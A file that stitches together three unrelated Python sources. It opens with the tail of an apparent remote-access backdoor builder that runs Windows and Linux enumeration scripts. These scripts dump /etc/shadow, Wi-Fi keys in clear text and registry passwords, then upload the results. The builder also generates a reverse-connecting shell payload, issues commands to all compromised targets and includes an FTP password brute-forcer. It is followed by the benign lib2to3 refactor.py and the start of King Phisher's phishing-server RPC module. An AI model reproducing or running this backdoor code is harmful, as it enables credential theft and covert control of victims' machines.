echo ################## type c:\sysprep\sysprep.xml>> %temp%\\winenumoutp22.txt
type c:\sysprep\sysprep.xml >> %temp%\\winenumoutp22.txt
echo. >> %temp%\\winenumoutp22.txt
echo ################## Network Information >> %temp%\\winenumoutp22.txt
echo ################## ipconfig /all >> %temp%\\winenumoutp22.txt
ipconfig /all >> %temp%\\winenumoutp22.txt
echo. >> %temp%\\winenumoutp22.txt
echo ################## net use (view current connetions) >> %temp%\\winenumoutp22.txt
net use >> %temp%\\winenumoutp22.txt
echo. >> %temp%\\winenumoutp22.txt
echo ################## net share (view shares) >> %temp%\\winenumoutp22.txt
net share >> %temp%\\winenumoutp22.txt
echo. >> %temp%\\winenumoutp22.txt
echo ################## arp -a >> %temp%\\winenumoutp22.txt
arp -a >> %temp%\\winenumoutp22.txt
echo. >> %temp%\\winenumoutp22.txt
echo ################## route print>> %temp%\\winenumoutp22.txt
route print >> %temp%\\winenumoutp22.txt
echo. >> %temp%\\winenumoutp22.txt
echo ################## netstat -nao >> %temp%\\winenumoutp22.txt
netstat -nao >> %temp%\\winenumoutp22.txt
echo. >> %temp%\\winenumoutp22.txt
echo ################## netsh firewall show state >> %temp%\\winenumoutp22.txt
netsh firewall show state >> %temp%\\winenumoutp22.txt
echo. >> %temp%\\winenumoutp22.txt
echo ################## netsh firewall show config >> %temp%\\winenumoutp22.txt
netsh firewall show config >> %temp%\\winenumoutp22.txt
echo. >> %temp%\\winenumoutp22.txt
echo ################## Shows wireless network information>> %temp%\\winenumoutp22.txt
netsh wlan export profile key=clear
type wi-fi*.xml >> %temp%\\winenumoutp22.txt
del wi-fi*.xml
echo. >> %temp%\\winenumoutp22.txt
echo ################## schtasks /query /fo LIST /v >> %temp%\\winenumoutp22.txt
schtasks /query /fo LIST /v >> %temp%\\winenumoutp22.txt
echo. >> %temp%\\winenumoutp22.txt
echo ################## net start >> %temp%\\winenumoutp22.txt
net start >> %temp%\\winenumoutp22.txt
echo. >> %temp%\\winenumoutp22.txt
echo ################## DRIVERQUERY >> %temp%\\winenumoutp22.txt
DRIVERQUERY >> %temp%\\winenumoutp22.txt
echo. >> %temp%\\winenumoutp22.txt
echo ################## Any mentions of "password" in the registry >> %temp%\\winenumoutp22.txt
reg query HKLM /f password /t REG_SZ /s >> %temp%\\winenumoutp22.txt
echo. >> %temp%\\winenumoutp22.txt
echo ################## Checking for services >> %temp%\\winenumoutp22.txt
wmic service get name,displayname,pathname,startmode | findstr /i "auto" >> %temp%\\winenumoutp22.txt
'''
f2 = open("f.bat", "w")
f2.write(f)
f2.close()
f3 = open("f.bat", "r")
for i in f3:
os.system(str(i.replace("\\n", '')))
p = subprocess.Popen("powershell $env:TEMP", shell=False, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, stdin=subprocess.PIPE)
output = p.stdout.read()
output = output.decode()
o = output.replace(" ", "").replace("\\r", "").replace("\\n", "").replace("'", "").replace("Path",
"").replace(
"--", "")
upload_file(o + "\\\winenumoutp22.txt")
os.system("powershell rm f.bat")
else:
f = '''echo "user_name " >>/tmp/enum55.txt
whoami >>/tmp/enum55.txt
echo "hostname " >>/tmp/enum55.txt
hostname >>/tmp/enum55.txt
echo "Kernel information " >>/tmp/enum55.txt
uname -a >>/tmp/enum55.txt
cat /proc/version >>/tmp/enum55.txt
cat /etc/*-release >>/tmp/enum55.txt
echo "user id " >>/tmp/enum55.txt
id >>/tmp/enum55.txt
echo "last logged on user information " >>/tmp/enum55.txt
lastlog >>/tmp/enum55.txt
echo "logs " >>/tmp/enum55.txt
w >>/tmp/enum55.txt
echo "see passwd " >>/tmp/enum55.txt
cat /etc/shadow >>/tmp/enum55.txt
cat /etc/passwd >>/tmp/enum55.txt
echo "grpinfo " >>/tmp/enum55.txt
echo -e "$grpinfo" | grep adm >>/tmp/enum55.txt
echo "installed dpkg " >>/tmp/enum55.txt
dpkg -l >>/tmp/enum55.txt
echo "files that has sudo " >>/tmp/enum55.txt
echo "" | sudo -S -l -k >>/tmp/enum55.txt
echo "directory permissions " >>/tmp/enum55.txt
ls -ahl /home/ >>/tmp/enum55.txt
ls -ahl >>/tmp/enum55.txt
echo "cronjub enum " >>/tmp/enum55.txt
ls -la /etc/cron* >>/tmp/enum55.txt
cat /etc/crontab >>/tmp/enum55.txt
echo "service enum " >>/tmp/enum55.txt
systemctl list-timers --all >>/tmp/enum55.txt
systemctl list-timers |head -n -1 >>/tmp/enum55.txt
echo "network enum " >>/tmp/enum55.txt
/sbin/ifconfig -a >>/tmp/enum55.txt
/sbin/ip a >>/tmp/enum55.txt
arp -a >>/tmp/enum55.txt
ip n >>/tmp/enum55.txt
grep "nameserver" /etc/resolv.conf >>/tmp/enum55.txt
systemd-resolve --status 2 >>/tmp/enum55.txt
netstat -ntpl >>/tmp/enum55.txt
ss -t -l -n >>/tmp/enum55.txt
netstat -nupl >>/tmp/enum55.txt
ss -u -l -n >>/tmp/enum55.txt
echo "running proces " >>/tmp/enum55.txt
ps aux >>/tmp/enum55.txt
echo "database enum " >>/tmp/enum55.txt
mysql --version >>/tmp/enum55.txt
mysqladmin -uroot -proot version >>/tmp/enum55.txt
mysqladmin -uroot version >>/tmp/enum55.txt
psql -V >>/tmp/enum55.txt
echo "apache enum " >>/tmp/enum55.txt
apache2 -v >>/tmp/enum55.txt
grep -i "user\|group" /etc/apache2/envvars >>/tmp/enum55.txt
echo "files enum " >>/tmp/enum55.txt
find / -name ".*" -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; >>/tmp/enum55.txt'''
f2 = open("f.sh", "w")
f2.write(f)
f2.close()
f3 = open("f.sh", "r")
for i in f3:
os.system(str(i.replace("\\n", '')))
upload_file("/tmp/enum55.txt")
os.system("rm f.sh")
else:
try:
if "nt" in os.name:
command = "powershell " + command
else:
command = command
echut = subprocess.Popen(command, shell=False, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, stdin=subprocess.PIPE)
output = echut.stdout.read() + echut.stderr.read()
output = output.decode()
reliable_send(output)
except:
reliable_send("error")
#
"""
payload_name = "payload.py"
if ("http" not in port):
print("h")
# ip = str(self.lineEdit.text())
port = int(port)
payload = payload_strick + f"""
while True:
try:
host = "{ip}"
port = {port}
connt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connt.connect((host, port))
shell_do()
except:
pass
"""
# payload=payload.replace('\r','\\r').replace('\n','\\n')
save = open(payload_name, 'w')
save.write(payload)
save.close()
print("done")
else:
# ip = str(self.lineEdit.text())
# port = int(port)
payload = payload_strick + f"""
from urllib.request import Request, urlopen
while True:
try:
host = "{ip}"
req1 = Request("{port}")
port= int(urlopen(req1).read().decode().replace("\\n",""))
connt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connt.connect((host, port))
shell_do()
except:
pass
"""
save = open(payload_name, 'w')
save.write(payload)
save.close()
print("done")
path = "payload/back_dor2s.py"
return send_file(path, as_attachment=True)
else:
return paylod_go_ha_sh()
# return render_template("payload.html")
@app.route('/payload.html', methods =["GET", "POST"])
def paylod_go_ha_sh():
tarid: str = str(request.form.get('tids'))
comand: str = str(request.form.get('commands'))
print(comand)
if (tarid.lower() == "all"):
print(tarid)
scmall=""
for i in rv.allAddress:
rv.GUI_accept_con2(rv.allAddress.index(i))
scmall+=str("target" + i[0] + ":" + str(i[1]) + "\n" + rv.GUI_communication(comand))+"\n"
return render_template("payload.html", targetcommandout=str(scmall))
else:
print(tarid)
tip = tarid[0:tarid.find(':')]
tport = tarid[tarid.find(':'):].replace(":", "")
targ = (tip, int(tport))
rv.GUI_accept_con2(rv.allAddress.index(targ))
return render_template("payload.html", targetcommandout=str(("target" + targ[0] + ":" + str(targ[1]) + "\n" + rv.GUI_communication(comand))))
# return render_template("payload.html",targetcommandout="his")
# @app.route('/brutefroce.html')
# def brutefroce():
# return render_template("brutefroce.html")
# global passwords,ftp
@app.route('/service_brute_goh')
def service_brute_goh(passwords):
passwords = passwords
def inner():
for password in passwords:
ftb = ftp.connect_ftp(password)
if ftb != None:
print(f"{ftp.GREEN}[+] Found credentials: \n")
print(f"{ftb} {ftp.RESET}")
yield str('[+] Found credentials: \n' + ftb) + '<br/>\n'
break
yield str("tring pass:" + password) + '<br/>\n'
return Response(inner(), mimetype='text/html')
# @app.route('/brutefroce.html', methods =["GET", "POST"])
# def brutefroce_go():
# service: str = str(request.form.get('servicetype'))
# username: str = str(request.form.get('username'))
# target: str = str(request.form.get('target'))
# file = request.files['file']
# if file and allowed_file(file.filename):
# filename = secure_filename(file.filename)
# file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
# filepas=str(os.path.join(app.config['UPLOAD_FOLDER'], filename))
# print(filepas)
# if(service=="ftp"):
# port = 21
# passwords = open(filepas).read().split("\n")
# print("[+] Passwords to try:", len(passwords))
# ftp = ftp_brute(target, username, port)
# try:
# return service_brute_goh(passwords)
# except:
# pass
# elif(service=="ssh"):
# pass
# return render_template('brutefroce.html')
# return render_template("brutefroce.html")
@app.route('/index.html')
def index2():
return render_template("index2.html")
@app.route('/test.html')
def test():
return render_template("test.html")
def mainW():
app.run()
if __name__ == '__main__':
mainW()
|
refactor.py
|
# Copyright 2006 Google, Inc. All Rights Reserved.
# Licensed to PSF under a Contributor Agreement.
"""Refactoring framework.
Used as a main program, this can refactor any number of files and/or
recursively descend down directories. Imported as a module, this
provides infrastructure to write your own refactoring tool.
"""
from __future__ import with_statement
__author__ = "Guido van Rossum <guido@python.org>"
# Python imports
import os
import sys
import logging
import operator
import collections
import io
from itertools import chain
# Local imports
from .pgen2 import driver, tokenize, token
from .fixer_util import find_root
from . import pytree, pygram
from . import btm_utils as bu
from . import btm_matcher as bm
def get_all_fix_names(fixer_pkg, remove_prefix=True):
"""Return a sorted list of all available fix names in the given package."""
pkg = __import__(fixer_pkg, [], [], ["*"])
fixer_dir = os.path.dirname(pkg.__file__)
fix_names = []
for name in sorted(os.listdir(fixer_dir)):
if name.startswith("fix_") and name.endswith(".py"):
if remove_prefix:
name = name[4:]
fix_names.append(name[:-3])
return fix_names
class _EveryNode(Exception):
pass
def _get_head_types(pat):
""" Accepts a pytree Pattern Node and returns a set
of the pattern types which will match first. """
if isinstance(pat, (pytree.NodePattern, pytree.LeafPattern)):
# NodePatters must either have no type and no content
# or a type and content -- so they don't get any farther
# Always return leafs
if pat.type is None:
raise _EveryNode
return set([pat.type])
if isinstance(pat, pytree.NegatedPattern):
if pat.content:
return _get_head_types(pat.content)
raise _EveryNode # Negated Patterns don't have a type
if isinstance(pat, pytree.WildcardPattern):
# Recurse on each node in content
r = set()
for p in pat.content:
for x in p:
r.update(_get_head_types(x))
return r
raise Exception("Oh no! I don't understand pattern %s" %(pat))
def _get_headnode_dict(fixer_list):
""" Accepts a list of fixers and returns a dictionary
of head node type --> fixer list. """
head_nodes = collections.defaultdict(list)
every = []
for fixer in fixer_list:
if fixer.pattern:
try:
heads = _get_head_types(fixer.pattern)
except _EveryNode:
every.append(fixer)
else:
for node_type in heads:
head_nodes[node_type].append(fixer)
else:
if fixer._accept_type is not None:
head_nodes[fixer._accept_type].append(fixer)
else:
every.append(fixer)
for node_type in chain(pygram.python_grammar.symbol2number.values(),
pygram.python_grammar.tokens):
head_nodes[node_type].extend(every)
return dict(head_nodes)
def get_fixers_from_package(pkg_name):
"""
Return the fully qualified names for fixers in the package pkg_name.
"""
return [pkg_name + "." + fix_name
for fix_name in get_all_fix_names(pkg_name, False)]
def _identity(obj):
return obj
if sys.version_info < (3, 0):
import codecs
_open_with_encoding = codecs.open
# codecs.open doesn't translate newlines sadly.
def _from_system_newlines(input):
return input.replace("\r\n", "\n")
def _to_system_newlines(input):
if os.linesep != "\n":
return input.replace("\n", os.linesep)
else:
return input
else:
_open_with_encoding = open
_from_system_newlines = _identity
_to_system_newlines = _identity
def _detect_future_features(source):
have_docstring = False
gen = tokenize.generate_tokens(io.StringIO(source).readline)
def advance():
tok = next(gen)
return tok[0], tok[1]
ignore = frozenset((token.NEWLINE, tokenize.NL, token.COMMENT))
features = set()
try:
while True:
tp, value = advance()
if tp in ignore:
continue
elif tp == token.STRING:
if have_docstring:
break
have_docstring = True
elif tp == token.NAME and value == "from":
tp, value = advance()
if tp != token.NAME or value != "__future__":
break
tp, value = advance()
if tp != token.NAME or value != "import":
break
tp, value = advance()
if tp == token.OP and value == "(":
tp, value = advance()
while tp == token.NAME:
features.add(value)
tp, value = advance()
if tp != token.OP or value != ",":
break
tp, value = advance()
else:
break
except StopIteration:
pass
return frozenset(features)
class FixerError(Exception):
"""A fixer could not be loaded."""
class RefactoringTool(object):
_default_options = {"print_function" : False}
CLASS_PREFIX = "Fix" # The prefix for fixer classes
FILE_PREFIX = "fix_" # The prefix for modules with a fixer within
def __init__(self, fixer_names, options=None, explicit=None):
"""Initializer.
Args:
fixer_names: a list of fixers to import
options: an dict with configuration.
explicit: a list of fixers to run even if they are explicit.
"""
self.fixers = fixer_names
self.explicit = explicit or []
self.options = self._default_options.copy()
if options is not None:
self.options.update(options)
if self.options["print_function"]:
self.grammar = pygram.python_grammar_no_print_statement
else:
self.grammar = pygram.python_grammar
self.errors = []
self.logger = logging.getLogger("RefactoringTool")
self.fixer_log = []
self.wrote = False
self.driver = driver.Driver(self.grammar,
convert=pytree.convert,
logger=self.logger)
self.pre_order, self.post_order = self.get_fixers()
self.files = [] # List of files that were or should be modified
self.BM = bm.BottomMatcher()
self.bmi_pre_order = [] # Bottom Matcher incompatible fixers
self.bmi_post_order = []
for fixer in chain(self.post_order, self.pre_order):
if fixer.BM_compatible:
self.BM.add_fixer(fixer)
# remove fixers that will be handled by the bottom-up
# matcher
elif fixer in self.pre_order:
self.bmi_pre_order.append(fixer)
elif fixer in self.post_order:
self.bmi_post_order.append(fixer)
self.bmi_pre_order_heads = _get_headnode_dict(self.bmi_pre_order)
self.bmi_post_order_heads = _get_headnode_dict(self.bmi_post_order)
def get_fixers(self):
"""Inspects the options to load the requested patterns and handlers.
Returns:
(pre_order, post_order), where pre_order is the list of fixers that
want a pre-order AST traversal, and post_order is the list that want
post-order traversal.
"""
pre_order_fixers = []
post_order_fixers = []
for fix_mod_path in self.fixers:
mod = __import__(fix_mod_path, {}, {}, ["*"])
fix_name = fix_mod_path.rsplit(".", 1)[-1]
if fix_name.startswith(self.FILE_PREFIX):
fix_name = fix_name[len(self.FILE_PREFIX):]
parts = fix_name.split("_")
class_name = self.CLASS_PREFIX + "".join([p.title() for p in parts])
try:
fix_class = getattr(mod, class_name)
except AttributeError:
raise FixerError("Can't find %s.%s" % (fix_name, class_name))
fixer = fix_class(self.options, self.fixer_log)
if fixer.explicit and self.explicit is not True and \
fix_mod_path not in self.explicit:
self.log_message("Skipping implicit fixer: %s", fix_name)
continue
self.log_debug("Adding transformation: %s", fix_name)
if fixer.order == "pre":
pre_order_fixers.append(fixer)
elif fixer.order == "post":
post_order_fixers.append(fixer)
else:
raise FixerError("Illegal fixer order: %r" % fixer.order)
key_func = operator.attrgetter("run_order")
pre_order_fixers.sort(key=key_func)
post_order_fixers.sort(key=key_func)
return (pre_order_fixers, post_order_fixers)
def log_error(self, msg, *args, **kwds):
"""Called when an error occurs."""
raise
def log_message(self, msg, *args):
"""Hook to log a message."""
if args:
msg = msg % args
self.logger.info(msg)
def log_debug(self, msg, *args):
if args:
msg = msg % args
self.logger.debug(msg)
def print_output(self, old_text, new_text, filename, equal):
"""Called with the old version, new version, and filename of a
refactored file."""
pass
def refactor(self, items, write=False, doctests_only=False):
"""Refactor a list of files and directories."""
for dir_or_file in items:
if os.path.isdir(dir_or_file):
self.refactor_dir(dir_or_file, write, doctests_only)
else:
self.refactor_file(dir_or_file, write, doctests_only)
def refactor_dir(self, dir_name, write=False, doctests_only=False):
"""Descends down a directory and refactor every Python file found.
Python files are assumed to have a .py extension.
Files and subdirectories starting with '.' are skipped.
"""
for dirpath, dirnames, filenames in os.walk(dir_name):
self.log_debug("Descending into %s", dirpath)
dirnames.sort()
filenames.sort()
for name in filenames:
if not name.startswith(".") and \
os.path.splitext(name)[1].endswith("py"):
fullname = os.path.join(dirpath, name)
self.refactor_file(fullname, write, doctests_only)
# Modify dirnames in-place to remove subdirs with leading dots
dirnames[:] = [dn for dn in dirnames if not dn.startswith(".")]
def _read_python_source(self, filename):
"""
Do our best to decode a Python source file correctly.
"""
try:
f = open(filename, "rb")
except IOError as err:
self.log_error("Can't open %s: %s", filename, err)
return None, None
try:
encoding = tokenize.detect_encoding(f.readline)[0]
finally:
f.close()
with _open_with_encoding(filename, "r", encoding=encoding) as f:
return _from_system_newlines(f.read()), encoding
def refactor_file(self, filename, write=False, doctests_only=False):
"""Refactors a file."""
input, encoding = self._read_python_source(filename)
if input is None:
# Reading the file failed.
return
input += "\n" # Silence certain parse errors
if doctests_only:
self.log_debug("Refactoring doctests in %s", filename)
output = self.refactor_docstring(input, filename)
if output != input:
self.processed_file(output, filename, input, write, encoding)
else:
self.log_debug("No doctest changes in %s", filename)
else:
tree = self.refactor_string(input, filename)
if tree and tree.was_changed:
# The [:-1] is to take off the \n we added earlier
self.processed_file(str(tree)[:-1], filename,
write=write, encoding=encoding)
else:
self.log_debug("No changes in %s", filename)
def refactor_string(self, data, name):
"""Refactor a given input string.
Args:
data: a string holding the code to be refactored.
name: a human-readable name for use in error/log messages.
Returns:
An AST corresponding to the refactored input stream; None if
there were errors during the parse.
"""
features = _detect_future_features(data)
if "print_function" in features:
self.driver.grammar = pygram.python_grammar_no_print_statement
try:
tree = self.driver.parse_string(data)
except Exception as err:
self.log_error("Can't parse %s: %s: %s",
name, err.__class__.__name__, err)
return
finally:
self.driver.grammar = self.grammar
tree.future_features = features
self.log_debug("Refactoring %s", name)
self.refactor_tree(tree, name)
return tree
def refactor_stdin(self, doctests_only=False):
input = sys.stdin.read()
if doctests_only:
self.log_debug("Refactoring doctests in stdin")
output = self.refactor_docstring(input, "<stdin>")
if output != input:
self.processed_file(output, "<stdin>", input)
else:
self.log_debug("No doctest changes in stdin")
else:
tree = self.refactor_string(input, "<stdin>")
if tree and tree.was_changed:
self.processed_file(str(tree), "<stdin>", input)
else:
self.log_debug("No changes in stdin")
def refactor_tree(self, tree, name):
"""Refactors a parse tree (modifying the tree in place).
For compatible patterns the bottom matcher module is
used. Otherwise the tree is traversed node-to-node for
matches.
Args:
tree: a pytree.Node instance representing the root of the tree
to be refactored.
name: a human-readable name for this tree.
Returns:
True if the tree was modified, False otherwise.
"""
for fixer in chain(self.pre_order, self.post_order):
fixer.start_tree(tree, name)
#use traditional matching for the incompatible fixers
self.traverse_by(self.bmi_pre_order_heads, tree.pre_order())
self.traverse_by(self.bmi_post_order_heads, tree.post_order())
# obtain a set of candidate nodes
match_set = self.BM.run(tree.leaves())
while any(match_set.values()):
for fixer in self.BM.fixers:
if fixer in match_set and match_set[fixer]:
#sort by depth; apply fixers from bottom(of the AST) to top
match_set[fixer].sort(key=pytree.Base.depth, reverse=True)
if fixer.keep_line_order:
#some fixers(eg fix_imports) must be applied
#with the original file's line order
match_set[fixer].sort(key=pytree.Base.get_lineno)
for node in list(match_set[fixer]):
if node in match_set[fixer]:
match_set[fixer].remove(node)
try:
find_root(node)
except AssertionError:
# this node has been cut off from a
# previous transformation ; skip
continue
if node.fixers_applied and fixer in node.fixers_applied:
# do not apply the same fixer again
continue
results = fixer.match(node)
if results:
new = fixer.transform(node, results)
if new is not None:
node.replace(new)
#new.fixers_applied.append(fixer)
for node in new.post_order():
# do not apply the fixer again to
# this or any subnode
if not node.fixers_applied:
node.fixers_applied = []
node.fixers_applied.append(fixer)
# update the original match set for
# the added code
new_matches = self.BM.run(new.leaves())
for fxr in new_matches:
if not fxr in match_set:
match_set[fxr]=[]
match_set[fxr].extend(new_matches[fxr])
for fixer in chain(self.pre_order, self.post_order):
fixer.finish_tree(tree, name)
return tree.was_changed
def traverse_by(self, fixers, traversal):
"""Traverse an AST, applying a set of fixers to each node.
This is a helper method for refactor_tree().
Args:
fixers: a list of fixer instances.
traversal: a generator that yields AST nodes.
Returns:
None
"""
if not fixers:
return
for node in traversal:
for fixer in fixers[node.type]:
results = fixer.match(node)
if results:
new = fixer.transform(node, results)
if new is not None:
node.replace(new)
node = new
def processed_file(self, new_text, filename, old_text=None, write=False,
encoding=None):
"""
Called when a file has been refactored, and there are changes.
"""
self.files.append(filename)
if old_text is None:
old_text = self._read_python_source(filename)[0]
if old_text is None:
return
equal = old_text == new_text
self.print_output(old_text, new_text, filename, equal)
if equal:
self.log_debug("No changes to %s", filename)
return
if write:
self.write_file(new_text, filename, old_text, encoding)
else:
self.log_debug("Not writing changes to %s", filename)
def write_file(self, new_text, filename, old_text, encoding=None):
"""Writes a string to a file.
It first shows a unified diff between the old text and the new text, and
then rewrites the file; the latter is only done if the write option is
set.
"""
try:
f = _open_with_encoding(filename, "w", encoding=encoding)
except os.error as err:
self.log_error("Can't create %s: %s", filename, err)
return
try:
f.write(_to_system_newlines(new_text))
except os.error as err:
self.log_error("Can't write %s: %s", filename, err)
finally:
f.close()
self.log_debug("Wrote changes to %s", filename)
self.wrote = True
PS1 = ">>> "
PS2 = "... "
def refactor_docstring(self, input, filename):
"""Refactors a docstring, looking for doctests.
This returns a modified version of the input string. It looks
for doctests, which start with a ">>>" prompt, and may be
continued with "..." prompts, as long as the "..." is indented
the same as the ">>>".
(Unfortunately we can't use the doctest module's parser,
since, like most parsers, it is not geared towards preserving
the original source.)
"""
result = []
block = None
block_lineno = None
indent = None
lineno = 0
for line in input.splitlines(True):
lineno += 1
if line.lstrip().startswith(self.PS1):
if block is not None:
result.extend(self.refactor_doctest(block, block_lineno,
indent, filename))
block_lineno = lineno
block = [line]
i = line.find(self.PS1)
indent = line[:i]
elif (indent is not None and
(line.startswith(indent + self.PS2) or
line == indent + self.PS2.rstrip() + "\n")):
block.append(line)
else:
if block is not None:
result.extend(self.refactor_doctest(block, block_lineno,
indent, filename))
block = None
indent = None
result.append(line)
if block is not None:
result.extend(self.refactor_doctest(block, block_lineno,
indent, filename))
return "".join(result)
def refactor_doctest(self, block, lineno, indent, filename):
"""Refactors one doctest.
A doctest is given as a block of lines, the first of which starts
with ">>>" (possibly indented), while the remaining lines start
with "..." (identically indented).
"""
try:
tree = self.parse_block(block, lineno, indent)
except Exception as err:
if self.logger.isEnabledFor(logging.DEBUG):
for line in block:
self.log_debug("Source: %s", line.rstrip("\n"))
self.log_error("Can't parse docstring in %s line %s: %s: %s",
filename, lineno, err.__class__.__name__, err)
return block
if self.refactor_tree(tree, filename):
new = str(tree).splitlines(True)
# Undo the adjustment of the line numbers in wrap_toks() below.
clipped, new = new[:lineno-1], new[lineno-1:]
assert clipped == ["\n"] * (lineno-1), clipped
if not new[-1].endswith("\n"):
new[-1] += "\n"
block = [indent + self.PS1 + new.pop(0)]
if new:
block += [indent + self.PS2 + line for line in new]
return block
def summarize(self):
if self.wrote:
were = "were"
else:
were = "need to be"
if not self.files:
self.log_message("No files %s modified.", were)
else:
self.log_message("Files that %s modified:", were)
for file in self.files:
self.log_message(file)
if self.fixer_log:
self.log_message("Warnings/messages while refactoring:")
for message in self.fixer_log:
self.log_message(message)
if self.errors:
if len(self.errors) == 1:
self.log_message("There was 1 error:")
else:
self.log_message("There were %d errors:", len(self.errors))
for msg, args, kwds in self.errors:
self.log_message(msg, *args, **kwds)
def parse_block(self, block, lineno, indent):
"""Parses a block into a tree.
This is necessary to get correct line number / offset information
in the parser diagnostics and embedded into the parse tree.
"""
tree = self.driver.parse_tokens(self.wrap_toks(block, lineno, indent))
tree.future_features = frozenset()
return tree
def wrap_toks(self, block, lineno, indent):
"""Wraps a tokenize stream to systematically modify start/end."""
tokens = tokenize.generate_tokens(self.gen_lines(block, indent).__next__)
for type, value, (line0, col0), (line1, col1), line_text in tokens:
line0 += lineno - 1
line1 += lineno - 1
# Don't bother updating the columns; this is too complicated
# since line_text would also have to be updated and it would
# still break for tokens spanning lines. Let the user guess
# that the column numbers for doctests are relative to the
# end of the prompt string (PS1 or PS2).
yield type, value, (line0, col0), (line1, col1), line_text
def gen_lines(self, block, indent):
"""Generates lines as expected by tokenize from a list of lines.
This strips the first len(indent + self.PS1) characters off each line.
"""
prefix1 = indent + self.PS1
prefix2 = indent + self.PS2
prefix = prefix1
for line in block:
if line.startswith(prefix):
yield line[len(prefix):]
elif line == prefix.rstrip() + "\n":
yield "\n"
else:
raise AssertionError("line=%r, prefix=%r" % (line, prefix))
prefix = prefix2
while True:
yield ""
class MultiprocessingUnsupported(Exception):
pass
class MultiprocessRefactoringTool(RefactoringTool):
def __init__(self, *args, **kwargs):
super(MultiprocessRefactoringTool, self).__init__(*args, **kwargs)
self.queue = None
self.output_lock = None
def refactor(self, items, write=False, doctests_only=False,
num_processes=1):
if num_processes == 1:
return super(MultiprocessRefactoringTool, self).refactor(
items, write, doctests_only)
try:
import multiprocessing
except ImportError:
raise MultiprocessingUnsupported
if self.queue is not None:
raise RuntimeError("already doing multiple processes")
self.queue = multiprocessing.JoinableQueue()
self.output_lock = multiprocessing.Lock()
processes = [multiprocessing.Process(target=self._child)
for i in range(num_processes)]
try:
for p in processes:
p.start()
super(MultiprocessRefactoringTool, self).refactor(items, write,
doctests_only)
finally:
self.queue.join()
for i in range(num_processes):
self.queue.put(None)
for p in processes:
if p.is_alive():
p.join()
self.queue = None
def _child(self):
task = self.queue.get()
while task is not None:
args, kwargs = task
try:
super(MultiprocessRefactoringTool, self).refactor_file(
*args, **kwargs)
finally:
self.queue.task_done()
task = self.queue.get()
def refactor_file(self, *args, **kwargs):
if self.queue is not None:
self.queue.put((args, kwargs))
else:
return super(MultiprocessRefactoringTool, self).refactor_file(
*args, **kwargs)
|
server_rpc.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# king_phisher/server/server_rpc.py
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the project nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import collections
import datetime
import functools
import logging
import threading
from king_phisher import errors
from king_phisher import geoip
from king_phisher import ipaddress
from king_phisher import version
from king_phisher.constants import ConnectionErrorReason
from king_phisher.server import graphql
from king_phisher.server import signals
from king_phisher.server.database import manager as db_manager
from king_phisher.server.database import models as db_models
import advancedhttpserver
import pyotp
CONFIG_READABLE = (
'beef.hook_url',
'server.address.host',
'server.address.port',
'server.require_id',
'server.secret_id',
'server.tracking_image',
'server.web_root'
)
"""Configuration options that can be accessed by the client."""
CONFIG_WRITEABLE = ('beef.hook_url',)
"""Configuration options that can be changed by the client at run time."""
RPC_AUTH_HEADER = 'X-RPC-Auth'
"""The header which contains the RPC authorization / session token."""
VIEW_ROW_COUNT = 50
"""The default number of rows to return when one of the /view methods are called."""
database_tables = db_models.database_tables
database_table_objects = db_models.database_table_objects
rpc_logger = logging.getLogger('KingPhisher.Server.RPC')
def register_rpc(path, database_access=False, log_call=False):
"""
Register an RPC function with the HTTP request handler. This allows the
method to be remotely invoked using King Phisher's standard RPC interface.
If *database_access* is specified, a SQLAlchemy session will be passed as
the second argument, after the standard
:py:class:`~advancedhttpserver.RequestHandler` instance.
:param str path: The path for the RPC function.
:param bool database_access: Whether or not the function requires database access.
:param bool log_call: Whether or not to log the arguments which the function is called with.
"""
path = '^' + path + '$'
def decorator(function):
@functools.wraps(function)
def wrapper(handler_instance, *args, **kwargs):
if log_call and rpc_logger.isEnabledFor(logging.DEBUG):
args_repr = ', '.join(map(repr, args))
if kwargs:
for key, value in sorted(kwargs.items()):
args_repr += ", {0}={1!r}".format(key, value)
msg = "calling RPC method {0}({1})".format(function.__name__, args_repr)
if getattr(handler_instance, 'rpc_session', False):
msg = handler_instance.rpc_session.user + ' is ' + msg
rpc_logger.debug(msg)
signals.rpc_method_call.send(path[1:-1], request_handler=handler_instance, args=args, kwargs=kwargs)
if database_access:
session = db_manager.Session()
try:
result = function(handler_instance, session, *args, **kwargs)
finally:
session.close()
else:
result = function(handler_instance, *args, **kwargs)
signals.rpc_method_called.send(path[1:-1], request_handler=handler_instance, args=args, kwargs=kwargs, retval=result)
return result
advancedhttpserver.RegisterPath(path, is_rpc=True)(wrapper)
return wrapper
return decorator
@register_rpc('/ping', log_call=True)
def rpc_ping(handler):
"""
An RPC method that can be used by clients to assert the status
and responsiveness of this server.
:return: This method always returns True.
:rtype: bool
"""
return True
@register_rpc('/shutdown', log_call=True)
def rpc_shutdown(handler):
"""
This method can be used to shut down the server. This function will
return, however no subsequent requests will be processed.
